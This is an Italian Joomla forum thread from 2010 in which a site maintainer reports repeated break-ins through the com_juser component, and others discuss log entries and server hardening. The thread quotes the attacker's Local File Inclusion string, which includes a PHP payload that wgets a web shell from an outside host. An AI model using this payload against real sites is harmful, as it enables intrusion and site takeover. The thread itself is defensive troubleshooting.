Joomla.it Forum
Non solo Joomla... => Sicurezza => : H3yB0y 09 Apr 2010, 23:59:38
-
Buona sera,
dopo aver fatto assistenza ad un sito di un mio cliente di Gerusalemme, ho notato che il componente com_juser è affetto da un bug.
Quale sia il problema ancora non mi è noto ma la stringa che utilizzano è la seguente:
//index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 200 2650 "-" "<?system('wget http://pacenoge.org/tool/simple_shell.txt -O media.php');?>"
Volevo aggiornare il componente ma i due siti del componente risultato irraggiungibili.
Per ora l'unica soluzione disponibile sembrerebbe rinominare il file juser.php ma poi il componente non funziona più.
Avete qualche idea? E' un pochino urgente in quanto mi ha detto che è la 5a volta che violano tale sito (dai log ho notato che sempre da quel componente arrivano le intrusioni)
P.S. mi scuso se sono fuori Topic, in quanto il componente è si di Joomla ma non è nativo.
-
cioè, tu hai usato quella stringa e funziona?
..non credo proprio funzioni su nessun joomla.
stringhe come questa ne ho almeno una cinquantina al giorno tra i log, guardane qualcuno di oggi:
libwww-perl/5.803', 'option=com_jcollection&controller=../../../../../../../../../../../../../../../proc/self/environ', '207.7.108.203', '2010-04-09 17:21:13', 'cardero.textdrive.com'
libwww-perl/5.803', 'option=com_jcollection&controller=../../../../../../../../../../../../../../../proc/self/environ', '207.7.108.203', '2010-04-09 17:21:13', 'cardero.textdrive.com',
libwww-perl/5.803', 'option=com_jcollection&controller=../../../../../../../../../../../../../../../proc/self/environ', '207.7.108.203', 54418, 'GET', '2010-04-09 17:21:11', 'cardero.textdrive.com'
libwww-perl/5.808', 'option=com_jcollection&controller=../../../../../../../../../../../../../../../proc/self/environ', '94.136.50.178', 39729, 'GET', '2010-04-09 17:20:13', 'ds7120.dedicated.turbodns.co.uk'
libwww-perl/5.808', 'option=com_jcollection&controller=../../../../../../../../../../../../../../../proc/self/environ', '94.136.50.178', 39724, 'GET', '2010-04-09 17:20:13', 'ds7120.dedicated.turbodns.co.uk'
libwww-perl/5.808', 'option=com_jcollection&controller=../../../../../../../../../../../../../../../proc/self/environ', '94.136.50.178', 39710, 'GET', '2010-04-09 17:20:12', 'ds7120.dedicated.turbodns.co.uk'
libwww-perl/5.803', 'option=com_jcollection&controller=../../../../../../../../../../../../../../../proc/self/environ', '207.7.108.203', 51051, 'GET', '2010-04-09 17:19:37', 'cardero.textdrive.com'
libwww-perl/5.808', 'option=com_jcollection&controller=../../../../../../../../../../../../../../../proc/self/environ', '94.136.50.178', 39171, 'GET', '2010-04-09 17:19:31', 'ds7120.dedicated.turbodns.co.uk'
M.
-
Ciao,
si funziona, infatti proprio in quel modo, riescono a violare il sito ed inserire i files.
<?system('wget http://pacenoge.org/tool/simple_shell.txt -O media.php');?>"
Il file che trovo nella home, infatti, è proprio media.php.
Rinominando il file, vedo dai log, che tali intrusioni non sono più "accettate" ma ora ho il componente non più funzionante.
Facendo delle ricerche molto approfondite, nelle varie crew, esiste un exploit proprio per il componente joomsuite user.
Volevo aggiornarlo ma il sito tutt'ora non funziona.
Il problema a cui mi riferisco io non è prettamente di joomla ma proprio del componente juser.
Facendo delle prove, infatti, con tale stringa riesco a violare il sito.
-
...si, ho visto, stanotte mi erano sfuggite delle cose.
quindi probabilmente anche jcollection deve avere lo stesso problema..
M.
-
ciao,
questo tipo di attacco si chiama Local File Inclusion, e può essere tanto un problema di joomla quanto del server.
ora se sia un bug di joomla non lo so (devo andare a vedere), ma di sicuro vi è un problema di configurazione del server.
come primo passo potresti configurare php perchè non legga niente fuori dalla root del web server.
per il resto avvisa il sysadmin che siete vulnerabili a questo tipo di attacco e lascia che sia lui a pensarci.
ciao,
marco